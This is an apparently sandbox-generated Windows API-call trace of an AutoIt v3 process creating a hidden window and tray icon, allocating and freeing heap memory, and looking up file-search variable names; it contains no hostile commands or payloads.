ImageList_ReplaceIcon (himl=0xbfcbd0, i=-1, hicon=0x60179) returned 0 [0256.555] CreateWindowExW (dwExStyle=0x0, lpClassName="AutoIt v3", lpWindowName="AutoIt v3", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=300, nHeight=100, hWndParent=0x0, hMenu=0x0, hInstance=0x290000, lpParam=0x0) returned 0x40172 [0256.555] NtdllDefWindowProc_W () returned 0x0 [0256.555] NtdllDefWindowProc_W () returned 0x1 [0256.558] NtdllDefWindowProc_W () returned 0x0 [0256.562] SetTimer (hWnd=0x40172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0256.563] RegisterClipboardFormatW (lpszFormat="TaskbarCreated") returned 0xc0c2 [0256.563] CreatePopupMenu () returned 0x90161 [0256.563] CreateWindowExW (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x50b008c4, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x40172, hMenu=0x1, hInstance=0x290000, lpParam=0x0) returned 0x60150 [0256.577] NtdllDefWindowProc_W () returned 0x0 [0256.577] ShowWindow (hWnd=0x40172, nCmdShow=0) returned 0 [0256.577] ShowWindow (hWnd=0x40172, nCmdShow=0) returned 0 [0256.577] Shell_NotifyIconW (dwMessage=0x0, lpData=0x7dfad8) returned 1 [0256.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20a) returned 0xbfd660 [0256.608] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.608] Shell_NotifyIconW (dwMessage=0x1, lpData=0x7df708) returned 1 [0256.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xbfd660 | out: hHeap=0xbc0000) returned 1 [0256.609] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.609] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.609] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9c70 [0256.610] CharUpperBuffW (in: lpsz="_FO_FILESEARCH", cchLength=0xe | out: lpsz="_FO_FILESEARCH") returned 0xe [0256.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9c70 | out: hHeap=0xbc0000) returned 1 [0256.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.610] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.610] CharUpperBuffW (in: lpsz="_FO_FOLDERSEARCH", cchLength=0x10 | out: lpsz="_FO_FOLDERSEARCH") returned 0x10 [0256.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.610] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.610] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCHMASK", cchLength=0x15 | out: lpsz="__FO_FOLDERSEARCHMASK") returned 0x15 [0256.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.610] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.610] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.610] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.611] CharUpperBuffW (in: lpsz="__FO_FOLDERSEARCH", cchLength=0x11 | out: lpsz="__FO_FOLDERSEARCH") returned 0x11 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.611] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.611] CharUpperBuffW (in: lpsz="__FO_FILESEARCHALL", cchLength=0x12 | out: lpsz="__FO_FILESEARCHALL") returned 0x12 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.611] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.611] CharUpperBuffW (in: lpsz="__CHEXCLUDEFOLDERS", cchLength=0x12 | out: lpsz="__CHEXCLUDEFOLDERS") returned 0x12 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.611] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.611] CharUpperBuffW (in: lpsz="__FO_GETLISTMASK", cchLength=0x10 | out: lpsz="__FO_GETLISTMASK") returned 0x10 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.611] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.611] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.611] CharUpperBuffW (in: lpsz="__FO_FILESEARCHTYPE", cchLength=0x13 | out: lpsz="__FO_FILESEARCHTYPE") returned 0x13 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.611] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.612] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.612] CharUpperBuffW (in: lpsz="__FO_FILESEARCHMASK", cchLength=0x13 | out: lpsz="__FO_FILESEARCHMASK") returned 0x13 [0256.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcdee10 | out: hHeap=0xbc0000) returned 1 [0256.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.612] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9c70 [0256.612] CharUpperBuffW (in: lpsz="__FO_USERLOCALE", cchLength=0xf | out: lpsz="__FO_USERLOCALE") returned 0xf [0256.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9c70 | out: hHeap=0xbc0000) returned 1 [0256.612] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5cf0 | out: hHeap=0xbc0000) returned 1 [0256.612] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9388 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9340 [0256.612] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5cf0 [0256.612] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9c70 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9310 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d00 [0256.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9310 | out: hHeap=0xbc0000) returned 1 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9c98 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9310 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9250 [0256.613] RtlSizeHeap (HeapHandle=0xbc0000, Flags=0x0, MemoryPointer=0xbe3138) returned 0x80 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d10 [0256.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9250 | out: hHeap=0xbc0000) returned 1 [0256.613] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d10 | out: hHeap=0xbc0000) returned 1 [0256.613] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9cc0 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9250 [0256.613] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d10 [0256.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9250 | out: hHeap=0xbc0000) returned 1 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9ce8 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9250 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9238 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d20 [0256.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9238 | out: hHeap=0xbc0000) returned 1 [0256.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d20 | out: hHeap=0xbc0000) returned 1 [0256.614] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9d10 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9238 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d20 [0256.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9238 | out: hHeap=0xbc0000) returned 1 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9d38 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9238 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93b8 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d30 [0256.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93b8 | out: hHeap=0xbc0000) returned 1 [0256.614] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d30 | out: hHeap=0xbc0000) returned 1 [0256.614] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9d60 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93b8 [0256.614] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d30 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93b8 | out: hHeap=0xbc0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9d88 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93b8 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93d0 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d40 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93d0 | out: hHeap=0xbc0000) returned 1 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d40 | out: hHeap=0xbc0000) returned 1 [0256.615] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9db0 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93d0 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d40 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93d0 | out: hHeap=0xbc0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee10 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93d0 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93e8 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d50 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93e8 | out: hHeap=0xbc0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93e8 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d60 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93e8 | out: hHeap=0xbc0000) returned 1 [0256.615] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d60 | out: hHeap=0xbc0000) returned 1 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9dd8 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93e8 [0256.615] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d60 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d60 | out: hHeap=0xbc0000) returned 1 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9400 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d60 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d60 | out: hHeap=0xbc0000) returned 1 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93e8 | out: hHeap=0xbc0000) returned 1 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9400 | out: hHeap=0xbc0000) returned 1 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9dd8 | out: hHeap=0xbc0000) returned 1 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d50 | out: hHeap=0xbc0000) returned 1 [0256.616] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9dd8 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9400 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d50 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9400 | out: hHeap=0xbc0000) returned 1 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9e00 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9400 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93e8 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d60 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93e8 | out: hHeap=0xbc0000) returned 1 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d60 | out: hHeap=0xbc0000) returned 1 [0256.616] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9e28 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93e8 [0256.616] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d60 [0256.616] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd93e8 | out: hHeap=0xbc0000) returned 1 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcded68 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd93e8 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9418 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d70 [0256.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9418 | out: hHeap=0xbc0000) returned 1 [0256.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d70 | out: hHeap=0xbc0000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9e50 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9418 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d70 [0256.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9418 | out: hHeap=0xbc0000) returned 1 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee48 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9418 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9430 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d80 [0256.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9430 | out: hHeap=0xbc0000) returned 1 [0256.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d80 | out: hHeap=0xbc0000) returned 1 [0256.617] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9e78 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9430 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d80 [0256.617] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9430 | out: hHeap=0xbc0000) returned 1 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x30) returned 0xcdee80 [0256.617] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9430 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5d90 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9448 | out: hHeap=0xbc0000) returned 1 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9ea0 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5da0 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5da0 | out: hHeap=0xbc0000) returned 1 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9460 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5da0 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5da0 | out: hHeap=0xbc0000) returned 1 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9448 | out: hHeap=0xbc0000) returned 1 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9460 | out: hHeap=0xbc0000) returned 1 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcc9ea0 | out: hHeap=0xbc0000) returned 1 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5d90 | out: hHeap=0xbc0000) returned 1 [0256.618] PeekMessageW (in: lpMsg=0x7dfdb4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfdb4) returned 0 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9ea0 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9460 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x4) returned 0xcd5d90 [0256.618] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9460 | out: hHeap=0xbc0000) returned 1 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9ec8 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9460 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.618] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5da0 [0256.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9448 | out: hHeap=0xbc0000) returned 1 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x20) returned 0xcc9ef0 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9448 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5db0 [0256.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5db0 | out: hHeap=0xbc0000) returned 1 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9478 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5db0 [0256.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5db0 | out: hHeap=0xbc0000) returned 1 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x10) returned 0xcd9490 [0256.619] RtlAllocateHeap (HeapHandle=0xbc0000, Flags=0x0, Size=0x8) returned 0xcd5db0 [0256.619] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd5db0 | out: hHeap=0xbc0000) returned 1 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9448 | out: hHeap=0xbc0000) returned 1 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9478 | out: hHeap=0xbc0000) returned 1 [0256.620] HeapFree (in: hHeap=0xbc0000, dwFlags=0x0, lpMem=0xcd9490 | out: 